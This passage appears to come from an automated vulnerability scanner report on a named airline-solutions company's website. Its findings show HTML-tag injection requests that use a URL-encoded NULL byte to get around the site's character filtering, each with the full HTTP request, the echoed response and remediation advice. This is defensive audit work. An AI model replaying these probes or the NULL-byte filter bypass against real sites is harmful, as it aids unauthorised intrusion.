Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:00:10 GMT
Pragma: no-cache
Content-Length: 6781
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>5631a4947eb=1">?%007842c<a>5631a4947eb=1</a>
...[SNIP]...

3.65. http://www.sabreairlinesolutions.com/home/contact/media_relations [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/media_relations

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002e0eb"><a>c644884f893 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e0eb"><a>c644884f893 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/media_relations?%002e0eb"><a>c644884f893=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321488; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:52:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321488; expires=Thu, 06-Oct-2011 09:52:53 GMT; path=/
Set-Cookie: exp_last_activity=1286376773; expires=Thu, 06-Oct-2011 09:52:53 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:53:10 GMT
Pragma: no-cache
Content-Length: 6629
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/media_relations?%002e0eb"><a>c644884f893=1">
...[SNIP]...

3.66. http://www.sabreairlinesolutions.com/home/contact/media_relations [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/media_relations

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %005296f<a>c26ff4d9c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5296f<a>c26ff4d9c0 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/media_relations?%005296f<a>c26ff4d9c0=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321488; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:57:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321488; expires=Thu, 06-Oct-2011 09:57:12 GMT; path=/
Set-Cookie: exp_last_activity=1286377032; expires=Thu, 06-Oct-2011 09:57:12 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:57:28 GMT
Pragma: no-cache
Content-Length: 6623
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>c26ff4d9c0=1">media relations?%005296f<a>c26ff4d9c0=1</a>
...[SNIP]...

3.67. http://www.sabreairlinesolutions.com/home/contact/media_relations/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/media_relations/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %008df90<a>37ff3b03616 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8df90<a>37ff3b03616 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/media_relations/?%008df90<a>37ff3b03616=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321436; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:02:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321436; expires=Thu, 06-Oct-2011 10:02:10 GMT; path=/
Set-Cookie: exp_last_activity=1286377330; expires=Thu, 06-Oct-2011 10:02:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A3%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:02:23 GMT
Pragma: no-cache
Content-Length: 6676
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>37ff3b03616=1">?%008df90<a>37ff3b03616=1</a>
...[SNIP]...

3.68. http://www.sabreairlinesolutions.com/home/contact/media_relations/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/media_relations/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ead24"><a>e7965e1db76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ead24"><a>e7965e1db76 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/media_relations/?%00ead24"><a>e7965e1db76=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321436; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:58:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321436; expires=Thu, 06-Oct-2011 09:58:42 GMT; path=/
Set-Cookie: exp_last_activity=1286377121; expires=Thu, 06-Oct-2011 09:58:42 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A3%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:58:59 GMT
Pragma: no-cache
Content-Length: 6680
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/media_relations/?%00ead24"><a>e7965e1db76=1">
...[SNIP]...

3.69. http://www.sabreairlinesolutions.com/home/contact/product_sales [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_sales

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001ec7c"><a>3f7052a6597 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1ec7c"><a>3f7052a6597 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_sales?%001ec7c"><a>3f7052a6597=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321496; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A3%3Bs%3A32%3A%22%2Fabout%2Fexecutive_team%2Ftom_klein%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:03:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321496; expires=Thu, 06-Oct-2011 10:03:39 GMT; path=/
Set-Cookie: exp_last_activity=1286377419; expires=Thu, 06-Oct-2011 10:03:39 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A4%3Bs%3A32%3A%22%2Fabout%2Fexecutive_team%2Ftom_klein%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:03:51 GMT
Pragma: no-cache
Content-Length: 6719
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/product_sales?%001ec7c"><a>3f7052a6597=1">
...[SNIP]...

3.70. http://www.sabreairlinesolutions.com/home/contact/product_sales [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_sales

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %006dd6e<a>c236508982f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6dd6e<a>c236508982f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_sales?%006dd6e<a>c236508982f=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321496; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A3%3Bs%3A32%3A%22%2Fabout%2Fexecutive_team%2Ftom_klein%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:07:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321496; expires=Thu, 06-Oct-2011 10:07:26 GMT; path=/
Set-Cookie: exp_last_activity=1286377646; expires=Thu, 06-Oct-2011 10:07:26 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A4%3Bs%3A32%3A%22%2Fabout%2Fexecutive_team%2Ftom_klein%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:07:38 GMT
Pragma: no-cache
Content-Length: 6715
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>c236508982f=1">product sales?%006dd6e<a>c236508982f=1</a>
...[SNIP]...

3.71. http://www.sabreairlinesolutions.com/home/contact/product_sales/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_sales/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0099963<a>2a2ea4d5865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99963<a>2a2ea4d5865 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_sales/?%0099963<a>2a2ea4d5865=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321412; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:52:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321412; expires=Thu, 06-Oct-2011 09:52:51 GMT; path=/
Set-Cookie: exp_last_activity=1286376770; expires=Thu, 06-Oct-2011 09:52:51 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:53:07 GMT
Pragma: no-cache
Content-Length: 6764
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>2a2ea4d5865=1">?%0099963<a>2a2ea4d5865=1</a>
...[SNIP]...

3.72. http://www.sabreairlinesolutions.com/home/contact/product_sales/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_sales/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0076d86"><a>d13558ba028 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76d86"><a>d13558ba028 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_sales/?%0076d86"><a>d13558ba028=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321412; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:48:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321412; expires=Thu, 06-Oct-2011 09:48:53 GMT; path=/
Set-Cookie: exp_last_activity=1286376532; expires=Thu, 06-Oct-2011 09:48:53 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:49:15 GMT
Pragma: no-cache
Content-Length: 6768
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/product_sales/?%0076d86"><a>d13558ba028=1">
...[SNIP]...

3.73. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_support_and_services

